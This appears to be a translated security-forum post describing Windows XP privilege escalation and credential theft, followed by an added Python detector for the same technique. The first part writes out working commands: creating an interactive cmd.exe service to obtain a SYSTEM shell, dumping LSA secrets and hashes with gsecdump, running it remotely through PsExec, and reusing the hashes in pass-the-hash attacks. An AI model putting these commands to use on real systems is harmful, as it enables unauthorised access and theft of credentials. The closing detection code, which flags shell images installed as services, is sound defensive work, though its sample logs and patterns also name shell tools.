To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to import the HASH information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tool. As the original article puts it well, it doesn't matter whether the password is 4 characters or 127, once you have the hash you are 100% in.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
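From the defender's side, the trick in the post leaves a recognisable trace: a "service installed" event (ID 7045) whose image path is a shell or interpreter rather than a real service binary, followed almost immediately by the Service Control Manager timeout (ID 7009, the same condition reported to the attacker as error 1053) because cmd.exe never reports back to the SCM. The following is an added example, not code from the post or from the truesec article it quotes; it runs over a few constructed log records in a simplified "EventID|ServiceName|ImagePath|Detail" format (a hypothetical layout, not the exact Windows event text) and flags service installs that match that pattern.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records (not real Windows event text). 7045 = a service
# was installed; 7009 = SCM timed out waiting for the service to connect.
SAMPLE_LOG = """\
7045|Spooler|C:\\WINDOWS\\system32\\spoolsv.exe|user mode service
7045|shellcmdline|C:\\WINDOWS\\system32\\cmd.exe /K start|user mode service
7009|shellcmdline||Timeout (30000 milliseconds) waiting for the service to connect
7045|backupagent|C:\\Program Files\\Backup\\agent.exe|user mode service
7045|updater|powershell.exe -nop -w hidden -c Get-Date|user mode service
"""

# Image names that are shells/interpreters, not things that should be
# registered as a service binary (assumed list; extend to taste).
SHELL_IMAGES = re.compile(
    r'(?:^|\\)(cmd|powershell|pwsh|wscript|cscript)\.exe\b', re.IGNORECASE)


@dataclass
class Finding:
    service: str
    image_path: str
    reasons: list = field(default_factory=list)


def parse_records(text):
    """Yield (event_id, service, image_path, detail) from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, service, image_path, detail = line.split('|', 3)
        yield int(event_id), service, image_path, detail


def find_suspicious_service_installs(text):
    """Return Findings for 7045 installs that look like the cmd.exe-as-service trick.

    Two signals are combined: the registered image is a shell/interpreter, and
    the SCM reported a start timeout (7009) for that same service afterwards.
    Either signal alone produces a finding; both together raise confidence.
    """
    installs = {}   # service name -> Finding, for every 7045 seen
    order = []      # preserve log order in the output
    for event_id, service, image_path, detail in parse_records(text):
        if event_id == 7045:
            finding = Finding(service, image_path)
            if SHELL_IMAGES.search(image_path):
                finding.reasons.append(
                    "image path is a shell/interpreter, not a service binary")
            installs[service] = finding
            order.append(finding)
        elif event_id == 7009 and service in installs:
            installs[service].reasons.append(
                "SCM start timeout after install (binary never connected to SCM)")
    return [f for f in order if f.reasons]


if __name__ == "__main__":
    for f in find_suspicious_service_installs(SAMPLE_LOG):
        print(f"{f.service}: {f.image_path}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host the same logic would be fed from the System event log (7045 and 7009 are the event IDs the Service Control Manager actually writes); the record format above is only a stand-in so the example runs offline.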